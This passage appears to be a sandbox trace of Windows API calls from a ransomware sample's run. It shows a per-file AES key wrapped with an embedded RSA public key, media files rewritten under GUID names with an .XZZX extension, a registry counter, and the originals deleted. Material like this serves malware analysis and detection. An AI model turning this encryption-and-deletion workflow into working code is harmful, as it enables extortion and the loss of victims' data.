phKey=0x29ad3ec | out: phKey=0x29ad3ec*=0x4372e38) returned 1 [0169.139] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0169.139] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0169.139] CryptEncrypt (in: hKey=0x4372e38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x29ad3f0*=0x80) returned 1 [0169.139] CryptEncrypt (in: hKey=0x4372e38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43a51c8*, pdwDataLen=0x29ad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x43a51c8*, pdwDataLen=0x29ad3e8*=0x80) returned 1 [0169.139] WriteFile (in: hFile=0x9bc, lpBuffer=0x43a51c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43a51c8*, lpNumberOfBytesWritten=0x29ae438*=0x80, lpOverlapped=0x0) returned 1 [0169.139] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0169.139] WriteFile (in: hFile=0x9bc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0169.139] GetUserNameW (in: lpBuffer=0x29ae1f8, pcbBuffer=0x29adfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29adfe0) returned 1 [0169.140] wsprintfW (in: param_1=0x29adff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0169.140] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe4 | out: phkResult=0x29adfe4*=0x9c4) returned 0x0 [0169.140] RegQueryValueExW (in: hKey=0x9c4, lpValueName="E1010314", lpReserved=0x0, lpType=0x29adfd8, lpData=0x29adfec, lpcbData=0x29adfdc*=0x4 | out: lpType=0x29adfd8*=0x4, lpData=0x29adfec*=0xfa, lpcbData=0x29adfdc*=0x4) returned 0x0 [0169.140] RegCloseKey (hKey=0x9c4) returned 0x0 [0169.140] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe8 | out: phkResult=0x29adfe8*=0x9c4) returned 0x0 [0169.140] RegSetValueExW (in: hKey=0x9c4, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x29adfec*=0xfb, cbData=0x4 | out: lpData=0x29adfec*=0xfb) returned 0x0 [0169.140] RegCloseKey (hKey=0x9c4) returned 0x0 [0169.140] VirtualFree (lpAddress=0x1ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.140] VirtualFree (lpAddress=0x1cb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.140] CloseHandle (hObject=0x9bc) returned 1 [0169.140] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0169.141] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0169.141] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\rvzAqm2.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ee7g-xhgdwjfqcsimmm\\rvzaqm2.flv")) returned 1 [0169.142] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\rvzAqm2.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ee7g-xhgdwjfqcsimmm\\rvzaqm2.flv")) returned 0 Thread: id = 576 os_tid = 0x638 [0169.176] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0169.176] lstrcpyW (in: lpString1=0x29af460, lpString2="TrEKohawJ.m4a" | out: lpString1="TrEKohawJ.m4a") returned="TrEKohawJ.m4a" [0169.176] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0169.176] SetErrorMode (uMode=0x1) returned 0x1 [0169.176] lstrcpyW (in: lpString1=0x29af860, lpString2="TrEKohawJ.m4a" | out: lpString1="TrEKohawJ.m4a") returned="TrEKohawJ.m4a" [0169.176] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0xc4f93e40, Data2=0xa057, Data3=0x4c8c, Data4=([0]=0xa4, [1]=0x1f, [2]=0x4c, [3]=0xc8, [4]=0x2d, [5]=0x84, [6]=0xb5, [7]=0xc8))) returned 0x0 [0169.176] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\TrEKohawJ.m4a") returned 75 [0169.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0169.176] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\B79C27C02FF18394C4F93E40328C67DC.XZZX") returned 99 [0169.176] StrStrW (lpFirst="TrEKohawJ.m4a", lpSrch="XZZX") returned 0x0 [0169.176] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\TrEKohawJ.m4a", dwFileAttributes=0x20) returned 1 [0169.176] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\TrEKohawJ.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ee7g-xhgdwjfqcsimmm\\trekohawj.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c0 [0169.177] ReadFile (in: hFile=0x9c0, lpBuffer=0x43b7d70, nNumberOfBytesToRead=0x1661d, lpNumberOfBytesRead=0x29ae418, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesRead=0x29ae418*=0x1661d, lpOverlapped=0x0) returned 1 [0169.178] CloseHandle (hObject=0x9c0) returned 1 [0169.178] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1ca0000 [0169.178] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1cb0000 [0169.178] SetErrorMode (uMode=0x1) returned 0x1 [0169.178] lstrcpyW (in: lpString1=0x29ae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0169.178] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x43a5250) returned 1 [0169.180] CryptGenKey (in: hProv=0x43a5250, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x4372978) returned 1 [0169.286] CryptExportKey (in: hKey=0x4372978, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ae41c | out: pbData=0x0*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0169.286] CryptExportKey (in: hKey=0x4372978, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1cb0000, pdwDataLen=0x29ae41c | out: pbData=0x1cb0000*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0169.286] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0169.286] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0169.286] CryptDestroyKey (hKey=0x4372978) returned 1 [0169.286] CryptReleaseContext (hProv=0x43a5250, dwFlags=0x0) returned 1 [0169.287] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\B79C27C02FF18394C4F93E40328C67DC.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ee7g-xhgdwjfqcsimmm\\b79c27c02ff18394c4f93e40328c67dc.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c0 [0169.287] WriteFile (in: hFile=0x9c0, lpBuffer=0x43b7d70*, nNumberOfBytesToWrite=0x1661d, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesWritten=0x29ae438*=0x1661d, lpOverlapped=0x0) returned 1 [0169.288] SetFilePointer (in: hFile=0x9c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1661d [0169.288] WriteFile (in: hFile=0x9c0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0169.288] SetFilePointer (in: hFile=0x9c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x16622 [0169.288] WriteFile (in: hFile=0x9c0, lpBuffer=0x29af860*, nNumberOfBytesToWrite=0x1a, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x29af860*, lpNumberOfBytesWritten=0x29ae438*=0x1a, lpOverlapped=0x0) returned 1 [0169.288] SetFilePointer (in: hFile=0x9c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1663c [0169.288] WriteFile (in: hFile=0x9c0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0169.288] SetFilePointer (in: hFile=0x9c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x16641 [0169.289] SetErrorMode (uMode=0x1) returned 0x1 [0169.289] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0169.289] OutputDebugStringW (lpOutputString="end") [0169.289] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x80\x8cÊ\x03`Õ\x9a\x02â", cchString=0x0, dwFlags=0x0, pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x29adbf4, pcbBinary=0x29ad3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0169.289] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x29adbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8 | out: pvStructInfo=0x29ad3dc, pcbStructInfo=0x29ad3d8) returned 1 [0169.289] CryptAcquireContextW (in: phProv=0x29ad3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x29ad3e4*=0x43a5250) returned 1 [0169.289] CryptImportPublicKeyInfo (in: hCryptProv=0x43a5250, dwCertEncodingType=0x1, pInfo=0x437fa48*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x437fa78*, PublicKey.cbData=0x8c, PublicKey.pbData=0x437fa80*, PublicKey.cUnusedBits=0x0), phKey=0x29ad3ec | out: phKey=0x29ad3ec*=0x4372e78) returned 1 [0169.289] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0169.290] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0169.290] CryptEncrypt (in: hKey=0x4372e78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ad3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x29ad3f0*=0x80) returned 1 [0169.290] CryptEncrypt (in: hKey=0x4372e78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43a52d8*, pdwDataLen=0x29ad3e8*=0x75, dwBufLen=0x80 | out: pbData=0x43a52d8*, pdwDataLen=0x29ad3e8*=0x80) returned 1 [0169.290] WriteFile (in: hFile=0x9c0, lpBuffer=0x43a52d8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43a52d8*, lpNumberOfBytesWritten=0x29ae438*=0x80, lpOverlapped=0x0) returned 1 [0169.290] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0169.290] WriteFile (in: hFile=0x9c0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0169.290] GetUserNameW (in: lpBuffer=0x29ae1f8, pcbBuffer=0x29adfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29adfe0) returned 1 [0169.290] wsprintfW (in: param_1=0x29adff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0169.290] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe4 | out: phkResult=0x29adfe4*=0x9c8) returned 0x0 [0169.290] RegQueryValueExW (in: hKey=0x9c8, lpValueName="E1010314", lpReserved=0x0, lpType=0x29adfd8, lpData=0x29adfec, lpcbData=0x29adfdc*=0x4 | out: lpType=0x29adfd8*=0x4, lpData=0x29adfec*=0xfb, lpcbData=0x29adfdc*=0x4) returned 0x0 [0169.290] RegCloseKey (hKey=0x9c8) returned 0x0 [0169.290] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x29adfe8 | out: phkResult=0x29adfe8*=0x9c8) returned 0x0 [0169.290] RegSetValueExW (in: hKey=0x9c8, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x29adfec*=0xfc, cbData=0x4 | out: lpData=0x29adfec*=0xfc) returned 0x0 [0169.290] RegCloseKey (hKey=0x9c8) returned 0x0 [0169.290] VirtualFree (lpAddress=0x1ca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.291] VirtualFree (lpAddress=0x1cb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.291] CloseHandle (hObject=0x9c0) returned 1 [0169.291] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0169.291] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0169.291] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\TrEKohawJ.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ee7g-xhgdwjfqcsimmm\\trekohawj.m4a")) returned 1 [0169.291] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\TrEKohawJ.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ee7g-xhgdwjfqcsimmm\\trekohawj.m4a")) returned 0 Thread: id = 577 os_tid = 0x744 [0169.329] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0169.329] lstrcpyW (in: lpString1=0x29af460, lpString2="TxQmAhXtJ1.mp3" | out: lpString1="TxQmAhXtJ1.mp3") returned="TxQmAhXtJ1.mp3" [0169.329] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0169.329] SetErrorMode (uMode=0x1) returned 0x1 [0169.329] lstrcpyW (in: lpString1=0x29af860, lpString2="TxQmAhXtJ1.mp3" | out: lpString1="TxQmAhXtJ1.mp3") returned="TxQmAhXtJ1.mp3" [0169.329] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x320bf52e, Data2=0x147e, Data3=0x489a, Data4=([0]=0xb3, [1]=0x75, [2]=0x4f, [3]=0x43, [4]=0x1d, [5]=0xff, [6]=0xea, [7]=0x5))) returned 0x0 [0169.329] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\TxQmAhXtJ1.mp3") returned 76 [0169.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0169.329] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\910A44A405CFC3CC320BF52E086AA814.XZZX") returned 99 [0169.329] StrStrW (lpFirst="TxQmAhXtJ1.mp3", lpSrch="XZZX") returned 0x0 [0169.329] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\TxQmAhXtJ1.mp3", dwFileAttributes=0x20) returned 1 [0169.330] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\TxQmAhXtJ1.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ee7g-xhgdwjfqcsimmm\\txqmahxtj1.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c4 [0169.330] ReadFile (in: hFile=0x9c4, lpBuffer=0x43b7d70, nNumberOfBytesToRead=0xb6ee, lpNumberOfBytesRead=0x29ae418, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesRead=0x29ae418*=0xb6ee, lpOverlapped=0x0) returned 1 [0169.331] CloseHandle (hObject=0x9c4) returned 1 [0169.331] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x1ca0000 [0169.331] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x1cb0000 [0169.331] SetErrorMode (uMode=0x1) returned 0x1 [0169.331] lstrcpyW (in: lpString1=0x29ae358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0169.331] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x43a5360) returned 1 [0169.333] CryptGenKey (in: hProv=0x43a5360, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x4372978) returned 1 [0169.455] CryptExportKey (in: hKey=0x4372978, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ae41c | out: pbData=0x0*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0169.455] CryptExportKey (in: hKey=0x4372978, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x1cb0000, pdwDataLen=0x29ae41c | out: pbData=0x1cb0000*, pdwDataLen=0x29ae41c*=0x94) returned 1 [0169.455] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0169.455] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0169.455] CryptDestroyKey (hKey=0x4372978) returned 1 [0169.455] CryptReleaseContext (hProv=0x43a5360, dwFlags=0x0) returned 1 [0169.455] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\910A44A405CFC3CC320BF52E086AA814.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ee7g-xhgdwjfqcsimmm\\910a44a405cfc3cc320bf52e086aa814.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c4 [0169.456] WriteFile (in: hFile=0x9c4, lpBuffer=0x43b7d70*, nNumberOfBytesToWrite=0xb6ee, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x43b7d70*, lpNumberOfBytesWritten=0x29ae438*=0xb6ee, lpOverlapped=0x0) returned 1 [0169.457] SetFilePointer (in: hFile=0x9c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb6ee [0169.457] WriteFile (in: hFile=0x9c4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0169.457] SetFilePointer (in: hFile=0x9c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb6f3 [0169.457] WriteFile (in: hFile=0x9c4, lpBuffer=0x29af860*, nNumberOfBytesToWrite=0x1c, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x29af860*, lpNumberOfBytesWritten=0x29ae438*=0x1c, lpOverlapped=0x0) returned 1 [0169.457] SetFilePointer (in: hFile=0x9c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb70f [0169.457] WriteFile (in: hFile=0x9c4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x29ae438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x29ae438*=0x5, lpOverlapped=0x0) returned 1 [0169.457] SetFilePointer (in: hFile=0x9c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb714 [0169.457] SetErrorMode (uMode=0x1) returned 0x1 [0169.457] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0169.457] OutputDebugStringW (lpOutputString="end") [0169.457] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV 